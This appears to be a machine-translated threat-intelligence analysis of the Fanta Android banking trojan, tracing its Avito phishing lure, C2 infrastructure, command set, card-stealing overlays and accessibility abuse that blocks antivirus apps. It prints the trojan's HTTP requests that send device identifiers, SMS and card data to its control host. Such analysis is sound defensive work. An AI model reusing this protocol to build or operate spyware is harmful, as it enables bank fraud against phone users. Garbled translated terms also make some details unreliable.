Леисиа, Фанта: нова тактика за стари Андроид тројанац

Једног дана желите да продате нешто на Авито-у и након што сте објавили детаљан опис свог производа (на пример, РАМ модул), добићете ову поруку:

Када отворите везу, видећете наизглед безазлену страницу која вас, срећног и успешног продавца, обавештава да је куповина обављена:

Када кликнете на дугме „Настави“, АПК датотека са иконом и именом које улива поверење биће преузето на ваш Андроид уређај. Инсталирао си апликацију која је из неког разлога тражила права АццессибилитиСервице, онда се појавило пар прозора који су брзо нестали и... То је то.

Одете да проверите стање, али из неког разлога ваша банкарска апликација поново тражи податке о картици. Након уноса података, дешава се нешто страшно: из неког разлога који вам још увек није јасан, новац почиње да нестаје са вашег рачуна. Покушавате да решите проблем, али ваш телефон се опире: притиска тастере „Назад“ и „Почетна“, не искључује се и не дозвољава вам да активирате никакве мере безбедности. Као резултат тога, остали сте без новца, ваша роба није купљена, збуњени сте и питате се: шта се догодило?

Одговор је једноставан: постали сте жртва Андроид Тројанца Фанта, члана Флекнет породице. Како се то догодило? Хајде сада да објаснимо.

Аутори: Андреј Половинкин, млађи специјалиста за анализу малвера, Иван Писарев, специјалиста за анализу малвера.

Неке статистике

Флекнет породица Андроид тројанаца први пут је постала позната још 2015. године. Током прилично дугог периода активности, породица се проширила на неколико подврста: Фанта, Лимебот, Липтон итд. Тројанац, као и инфраструктура повезана с њим, не мирују: развијају се нове ефикасне шеме дистрибуције - у нашем случају, висококвалитетне пхисхинг странице намењене одређеном кориснику-продавцу, а програмери тројана прате модерне трендове у писање вируса - додавање нове функционалности која омогућава ефикаснију крађу новца са заражених уређаја и заобилажење заштитних механизама.

Кампања описана у овом чланку је намењена корисницима из Русије, мали број заражених уређаја забележен је у Украјини, а још мање у Казахстану и Белорусији.

Иако је Флекнет у арени Андроид тројана већ више од 4 године и детаљно су га проучавали многи истраживачи, и даље је у доброј форми. Од јануара 2019. потенцијална штета је већа од 35 милиона рубаља – и то само за кампање у Русији. У 2015. години разне верзије овог Андроид тројанца су се продавале на подземним форумима, где се могао наћи и изворни код тројанца са детаљним описом. То значи да је статистика штете у свету још импресивнија. Није лош показатељ за тако старца, зар не?

Од продаје до преваре

Као што се може видети из претходно приказаног снимка екрана пхисхинг странице за интернет сервис за постављање огласа Авито, припремљена је за одређену жртву. Очигледно, нападачи користе један од Авитових парсера, који извлачи број телефона и име продавца, као и опис производа. Након проширења странице и припреме АПК датотеке, жртви се шаље СМС са његовим именом и везом до пхисхинг странице која садржи опис његовог производа и износ добијен од „продаје“ производа. Кликом на дугме корисник добија злонамерну АПК датотеку - Фанта.

Студија домена схцет491[.]ру показала је да је делегиран на Хостингерове ДНС сервере:

• нс1.хостингер.ру
• нс2.хостингер.ру
• нс3.хостингер.ру
• нс4.хостингер.ру

Датотека доменске зоне садржи уносе који упућују на ИП адресе 31.220.23[.]236, 31.220.23[.]243 и 31.220.23[.]235. Међутим, запис примарног ресурса домена (А запис) указује на сервер са ИП адресом 178.132.1[.]240.

ИП адреса 178.132.1[.]240 се налази у Холандији и припада хосту ВорлдСтреам. ИП адресе 31.220.23[.]235, 31.220.23[.]236 и 31.220.23[.]243 налазе се у УК и припадају серверу за дељени хостинг ХОСТИНГЕР. Користи се као снимач опенпров-ру. Следећи домени су такође решени на ИП адресу 178.132.1[.]240:

• сделка-ру[.]ру
• товар-ав[.]ру
• ав-товар[.]ру
• ру-сделка[.]ру
• схцет382[.]ру
• сделка221[.]ру
• сделка211[.]ру
• виплата437[.]ру
• виплата291[.]ру
• перевод273[.]ру
• перевод901[.]ру

Треба напоменути да су везе у следећем формату биле доступне са скоро свих домена:

http://(www.){0,1}<%domain%>/[0-9]{7}

Овај шаблон такође укључује везу из СМС поруке. На основу историјских података, установљено је да један домен одговара неколико веза у горе описаном обрасцу, што указује да је један домен коришћен за дистрибуцију Тројанца на неколико жртава.

Хајдемо мало напред: Тројанац преузет преко везе са СМС-а користи адресу као контролни сервер онуседседдохап[.]цлуб. Овај домен је регистрован 2019-03-12, а почев од 2019-04-29, АПК апликације су ступиле у интеракцију са овим доменом. На основу података добијених од ВирусТотал-а, са овим сервером је ступило у интеракцију укупно 109 апликација. Сам домен је разрешен на ИП адресу 217.23.14[.]27, који се налази у Холандији и у власништву је хостера ВорлдСтреам. Користи се као снимач намецхеап. Домени су такође решени на ову ИП адресу бад-рацоон[.]клуб (почев од 2018) и бад-рацоон[.]уживо (почев од 2018.). Са доменом бад-рацоон[.]клуб са више од 80 АПК датотека је ступило у интеракцију бад-рацоон[.]уживо - више од 100.

Генерално, напад напредује на следећи начин:

Шта је испод Фантиног поклопца?

Као и многи други Андроид тројанци, Фанта је способна да чита и шаље СМС поруке, поставља УССД захтеве и приказује сопствене прозоре на врху апликација (укључујући и банкарске). Међутим, арсенал функционалности ове породице је стигао: Фанта је почела да користи АццессибилитиСервице у различите сврхе: читање садржаја обавештења из других апликација, спречавање откривања и заустављање извршавања тројанца на зараженом уређају итд. Фанта ради на свим верзијама Андроида не млађим од 4.4. У овом чланку ћемо детаљније погледати следећи пример Фанта:

• МДКСНУМКС: 0826bd11b2c130c4c8ac137e395ac2d4
• СХАКСНУМКС: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• СХАКСНУМКС: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Одмах након лансирања

Одмах након покретања, тројанац сакрива своју икону. Апликација може да ради само ако име зараженог уређаја није на листи:

• андроид_к86
• ВиртуалБок
• Некус 5Кс (глава глава)
• Некус 5 (жилет)

Ова провера се врши у главној служби Тројанца - МаинСервице. Приликом првог покретања, конфигурациони параметри апликације се иницијализују на подразумеване вредности (формат за чување конфигурационих података и њихово значење биће речи касније), а нови заражени уређај се региструје на контролном серверу. ХТТП ПОСТ захтев са типом поруке ће бити послат серверу регистер_бот и информације о зараженом уређају (Андроид верзија, ИМЕИ, број телефона, назив оператера и код земље у којој је оператер регистрован). Адреса служи као контролни сервер хКСКСп://онусеседдохап[.]цлуб/цонтроллер.пхп. Као одговор, сервер шаље поруку која садржи поља бот_ид, бот_пвд, сервер — апликација чува ове вредности као параметре ЦнЦ сервера. Параметар сервер опционо ако поље није примљено: Фанта користи адресу за регистрацију - хКСКСп://онусеседдохап[.]цлуб/цонтроллер.пхп. Функција промене ЦнЦ адресе може се користити за решавање два проблема: за равномерну дистрибуцију оптерећења између неколико сервера (ако постоји велики број заражених уређаја, оптерећење на неоптимизованом веб серверу може бити велико), као и за коришћење алтернативни сервер у случају квара једног од ЦнЦ сервера .

Ако дође до грешке приликом слања захтева, тројанац ће поновити процес регистрације након 20 секунди.

Када је уређај успешно регистрован, Фанта ће кориснику приказати следећу поруку:

Важна напомена: служба је позвала Сигурност система — назив тројанског сервиса, а након клика на дугме у реду Отвориће се прозор са подешавањима приступачности зараженог уређаја, где корисник мора да додели права приступачности за злонамерну услугу:

Чим се корисник укључи АццессибилитиСервице, Фанта добија приступ садржају прозора апликација и радњама које се у њима обављају:

Одмах по добијању права приступачности, тројанац захтева администраторска права и права да чита обавештења:

Користећи АццессибилитиСервице, апликација симулира притиске на тастере, чиме себи даје сва потребна права.

Фанта креира више инстанци базе података (које ће бити описане касније) неопходних за чување конфигурационих података, као и информација прикупљених у процесу о зараженом уређају. Да би послао прикупљене информације, тројанац креира задатак који се понавља дизајниран да преузме поља из базе података и прими команду од контролног сервера. Интервал за приступ ЦнЦ-у је подешен у зависности од верзије Андроид-а: у случају 5.1, интервал ће бити 10 секунди, у супротном 60 секунди.

Да би примила команду, Фанта поставља захтев ГетТаск на сервер за управљање. Као одговор, ЦнЦ може послати једну од следећих команди:

Тим	Опис
0	Пошаљите СМС поруку
1	Упутите телефонски позив или УССД команду
2	Ажурира параметар интервал
3	Ажурира параметар интерцепт
6	Ажурира параметар смсМанагер
9	Почните да прикупљате СМС поруке
11	Ресетујте телефон на фабричка подешавања
12	Омогући/онемогући евидентирање креирања дијалога

Фанта такође прикупља обавештења од 70 банкарских апликација, система за брзо плаћање и е-новчаника и складишти их у бази података.

Чување конфигурационих параметара

За чување конфигурационих параметара, Фанта користи стандардни приступ за Андроид платформу - Приоритети-фајлови. Подешавања ће бити сачувана у датотеци под називом Подешавања. Опис сачуваних параметара налази се у табели испод.

име	Задана вриједност	Могуће вредности	Опис
id	0	Цео број	Бот ИД
сервер	хКСКСп://онусеседдохап[.]цлуб/	УРЛ адреса	Контролна адреса сервера
пвд	-	низ	Шифра сервера
интервал	20	Цео број	Временски период. Означава колико дуго треба одложити следеће задатке: Приликом слања захтева о статусу послате СМС поруке Примање нове команде од сервера за управљање
интерцепт	све	све/тел.број	Ако је поље једнако низу све или телНумбер, онда ће примљена СМС порука бити пресретна од стране апликације и неће бити приказана кориснику
смсМанагер	0	0/1	Омогућите/онемогућите апликацију као подразумеваног примаоца СМС-а
реадДиалог	лажан	Тачно нетачно	Омогући/онемогући евидентирање догађаја АццессибилитиЕвент

Фанта такође користи датотеку смсМанагер:

име	Задана вриједност	Могуће вредности	Опис
пцкг	-	низ	Назив коришћеног менаџера СМС порука

Интеракција са базама података

Током свог рада, тројанац користи две базе података. Именована база података a користи се за чување разних информација прикупљених са телефона. Друга база података је именована фанта.дб и користи се за чување подешавања одговорних за креирање пхисхинг прозора дизајнираних за прикупљање информација о банковним картицама.

Тројанац користи базу података а за чување прикупљених информација и евидентирање ваших радњи. Подаци се чувају у табели трупци. Да бисте креирали табелу, користите следећи СКЛ упит:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

База података садржи следеће информације:

1. Евидентирање покретања зараженог уређаја поруком Телефон се укључио!

2. Обавештења из апликација. Порука се генерише према следећем шаблону:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Подаци о банковној картици из пхисхинг образаца које је креирао тројанац. Параметар ВИЕВ_НАМЕ може бити једно од следећег:

• АлиЕкпресс
• Авито
• Гоогле Плаи-
• Разно <%Апп Наме%>

Порука се евидентира у формату:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Долазне/одлазне СМС поруке у формату:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Информације о пакету који креира оквир за дијалог у формату:

(<%Package name%>)<%Package information%>

Пример табеле трупци:

Једна од функционалности Фанте је прикупљање информација о банковним картицама. Прикупљање података се дешава кроз креирање пхисхинг прозора приликом отварања банкарских апликација. Тројанац креира пхисхинг прозор само једном. Информације да је прозор приказан кориснику се чувају у табели Подешавања у бази података фанта.дб. Да бисте креирали базу података, користите следећи СКЛ упит:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Сва поља табеле Подешавања подразумевано иницијализовано на 1 (направи прозор за пхисхинг). Након што корисник унесе своје податке, вредност ће бити постављена на 0. Пример поља табеле Подешавања:

• цан_логин — поље је одговорно за приказ обрасца приликом отварања банкарске апликације
• прва_банка - не користи
• цан_авито — поље је одговорно за приказ обрасца приликом отварања апликације Авито
• цан_али — поље је одговорно за приказ обрасца приликом отварања апликације Алиекпресс
• цан_анотхер — поље је одговорно за приказ обрасца приликом отварања било које апликације са листе: Иула, Пандао, Дром Ауто, Новчаник. Картице за попуст и бонус, Авиасалес, Боокинг, Триваго
• цан_цард — поље је одговорно за приказ обрасца при отварању Гоогле Плаи-

Интеракција са сервером за управљање

Мрежна интеракција са сервером за управљање одвија се преко ХТТП протокола. За рад са мрежом, Фанта користи популарну библиотеку Ретрофит. Захтеви се шаљу на: хКСКСп://онусеседдохап[.]цлуб/цонтроллер.пхп. Адреса сервера се може променити приликом регистрације на серверу. Колачићи се могу послати као одговор са сервера. Фанта шаље следеће захтеве серверу:

• Регистрација бота на контролном серверу се дешава једном, при првом покретању. Следећи подаци о зараженом уређају се шаљу на сервер:
  · колачић — колачићи примљени са сервера (подразумевана вредност је празан стринг)
  · начин — стринг константа регистер_бот
  · префикс — целобројна константа 2
  · версион_сдк — формира се према следећем шаблону: <%Буилд.МОДЕЛ%>/<%Буилд.ВЕРСИОН.РЕЛЕАСЕ%>(Авит)
  · имеи — ИМЕИ зараженог уређаја
  · земља — код земље у којој је оператер регистрован, у ИСО формату
  · број - Број телефона
  · оператор — име оператера

  Пример захтева послатог серверу:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  Као одговор на захтев, сервер мора да врати ЈСОН објекат који садржи следеће параметре:
  · бот_ид — ИД зараженог уређаја. Ако је бот_ид једнак 0, Фанта ће поново извршити захтев.
  бот_пвд — лозинка за сервер.
  сервер — адреса контролног сервера. Опциони параметар. Ако параметар није наведен, користиће се адреса сачувана у апликацији.

  Пример ЈСОН објекта:

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• Захтев за пријем команде од сервера. Следећи подаци се шаљу на сервер:
  · колачић — колачићи примљени са сервера
  · понуда — ИД зараженог уређаја који је примљен приликом слања захтева регистер_бот
  · пвд — лозинка за сервер
  · дивице_админ — поље одређује да ли су добијена администраторска права. Ако су добијена администраторска права, поље је једнако 1, иначе 0
  · Приступачност — Статус рада услуге приступачности. Ако је услуга покренута, вредност је 1, иначе 0
  · СМСМанагер — показује да ли је тројанац омогућен као подразумевана апликација за пријем СМС-а
  · екран — приказује у ком је стању екран. Вредност ће бити подешена 1, ако је екран укључен, у супротном 0;

  Пример захтева послатог серверу:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  У зависности од команде, сервер може да врати ЈСОН објекат са различитим параметрима:

  · Тим Пошаљите СМС поруку: Параметри садрже број телефона, текст СМС поруке и ИД поруке која се шаље. Идентификатор се користи приликом слања поруке на сервер са типом сетСмсСтатус.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · Тим Упутите телефонски позив или УССД команду: Број телефона или команда долази у телу одговора.

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · Тим Промените параметар интервала.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · Тим Промените параметар пресретања.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · Тим Промените поље СмсМанагер.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · Тим Прикупљајте СМС поруке са зараженог уређаја.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · Тим Ресетујте телефон на фабричка подешавања:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · Тим Промените РеадДиалог параметар.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• Слање поруке са типом сетСмсСтатус. Овај захтев се поставља након што се наредба изврши Пошаљите СМС поруку. Захтев изгледа овако:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• Учитавање садржаја базе података. Један ред се преноси по захтеву. Следећи подаци се шаљу на сервер:
  · колачић — колачићи примљени са сервера
  · начин — стринг константа сетСавеИнбокСмс
  · понуда — ИД зараженог уређаја који је примљен приликом слања захтева регистер_бот
  · текст — текст у тренутном запису базе података (поље d са стола трупци у бази података а)
  · број — назив тренутног записа базе података (поље p са стола трупци у бази података а)
  · смс_моде — целобројна вредност (поље m са стола трупци у бази података а)

  Захтев изгледа овако:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  Ако се успешно пошаље на сервер, ред ће бити обрисан из табеле. Пример ЈСОН објекта који је вратио сервер:

  {
      "response":[],
      "status":"ok"
  }

Интеракција са АццессибилитиСервицеом

АццессибилитиСервице је имплементиран да би људима са инвалидитетом олакшао коришћење Андроид уређаја. У већини случајева потребна је физичка интеракција за интеракцију са апликацијом. АццессибилитиСервице вам омогућава да их урадите програмски. Фанта користи услугу да креира лажне прозоре у банкарским апликацијама и спречи кориснике да отворе системска подешавања и неке апликације.

Користећи функционалност услуге АццессибилитиСервице, тројанац прати промене елемената на екрану зараженог уређаја. Као што је претходно описано, подешавања Фанта садрже параметар одговоран за евидентирање операција са дијалошким оквирима - реадДиалог. Ако је овај параметар подешен, информације о имену и опису пакета који је покренуо догађај биће додати у базу података. Тројанац извршава следеће радње када се догађаји покрену:

• Симулира притискање тастера за повратак и почетак у следећим случајевима:
  · ако корисник жели да поново покрене свој уређај
  · ако корисник жели да избрише апликацију „Авито“ или да промени права приступа
  · ако се на страници помиње апликација „Авито“.
  · приликом отварања апликације Гоогле Плаи Протецт
  · када отварате странице са подешавањима АццессибилитиСервице
  · када се појави дијалог Безбедност система
  · када отворите страницу са подешавањима „Нацртај преко друге апликације“.
  · када отворите страницу „Апликације“, „Опоравак и ресетовање“, „Ресетовање података“, „Ресетовање подешавања“, „Панел за програмере“, „Посебно. могућности“, „Посебне могућности“, „Посебна права“
  · ако је догађај генерисан од стране одређених апликација.

  Листа апликација

  • андроид
  • Мастер Лите
  • Чист мајстор
  • Цлеан Мастер за к86 ЦПУ
  • Управљање дозволама за апликацију Меизу
  • МИУИ Сецурити
  • Цлеан Мастер - Антивирус и чистач кеша и смећа
  • Родитељски надзор и ГПС: Касперски СафеКидс
  • Касперски Антивирус АппЛоцк & Веб Сецурити Бета
  • Чистач вируса, антивирус, чистач (МАКС Сецурити)
  • Мобиле АнтиВирус Сецурити ПРО
  • Аваст антивирус и бесплатна заштита 2019
  • Мобиле Сецурити МегаФон
  • АВГ заштита за Кспериа
  • Мобиле Сецурити
  • Малваребитес антивирус и заштита
  • Антивирус за Андроид 2019
  • Сецурити Мастер - Антивирус, ВПН, АппЛоцк, Боостер
  • АВГ антивирус за Хуавеи таблет Систем Манагер
  • Самсунг Аццессибилити
  • Самсунг Смарт Манагер
  • Сецурити Мастер
  • Спеед Боостер
  • Др.Веб
  • Др.Веб сигурносни простор
  • Др.Веб Мобиле Цонтрол Центер
  • Др.Веб Сецурити Спаце Лифе
  • Др.Веб Мобиле Цонтрол Центер
  • Антивирусна и мобилна безбедност
  • Касперски Интернет Сецурити: Антивирус и заштита
  • Касперски Баттери Лифе: Савер & Боостер
  • Касперски Ендпоинт Сецурити - заштита и управљање
  • АВГ Антивирус бесплатан 2019 – Заштита за Андроид
  • Андроид антивирусни
  • Нортон Мобиле Сецурити и Антивирус
  • Антивирус, заштитни зид, ВПН, мобилна безбедност
  • Мобилна безбедност: антивирус, ВПН, заштита од крађе
  • Антивирус за Андроид

• Ако се приликом слања СМС поруке на кратак број тражи дозвола, Фанта симулира клик на поље за потврду Запамтите избор и дугме пошаљи.
• Када покушате да одузмете администраторска права Тројанцу, он закључава екран телефона.
• Спречава додавање нових администратора.
• Ако антивирусна апликација др.веб детектовала претњу, Фанта имитира притисак на дугме игнорисати.
• Тројанац симулира притискање дугмета за повратак и почетак ако је догађај генерисао апликација Самсунг Девице Царе.
• Фанта креира пхисхинг прозоре са обрасцима за унос података о банковним картицама ако је покренута апликација са листе од око 30 различитих Интернет сервиса. Међу њима: АлиЕкпресс, Боокинг, Авито, Гоогле Плаи Маркет Цомпонент, Пандао, Дром Ауто, итд.
  

  Пхисхинг Формс

  Фанта анализира које апликације раде на зараженом уређају. Ако је отворена апликација од интереса, тројанац изнад свих осталих приказује прозор за пхисхинг, који је образац за унос података о банковној картици. Корисник мора да унесе следеће податке:

  • Број картице
  • Картица Датум истека
  • ЦВВ
  • Име власника картице (не за све банке)

  У зависности од покренуте апликације, биће приказани различити прозори за пхисхинг. Испод су примери неких од њих:

  Алиекпресс:

  
  Авито:

  
  За неке друге апликације, нпр. Гоогле Плаи Маркет, Авиасалес, Пандао, Боокинг, Триваго:
  

  Како је заиста било
  

  На срећу, испоставило се да је особа која је примила СМС поруку описану на почетку чланка специјалиста за сајбер безбедност. Дакле, права, не-режитељска верзија се разликује од оне раније речено: особа је добила занимљив СМС, након чега га је дала тиму Гроуп-ИБ Тхреат Хунтинг Интеллигенце тиму. Резултат напада је овај чланак. Срећан крај, зар не? Међутим, не завршавају се све приче тако успешно, а да ваша не би личила на редитељски рез са губитком новца, у већини случајева довољно је да се придржавате следећих дуго описаних правила:

  • немојте инсталирати апликације за мобилни уређај са Андроид ОС-ом из било ког другог извора осим са Гоогле Плаи-а
  • Приликом инсталирања апликације обратите посебну пажњу на права која апликација захтева
  • обратите пажњу на екстензије преузетих датотека
  • редовно инсталирајте ажурирања Андроид ОС-а
  • не посећујте сумњиве ресурсе и не преузимајте датотеке одатле
  • Не кликајте на линкове примљене у СМС порукама.

Извор: ввв.хабр.цом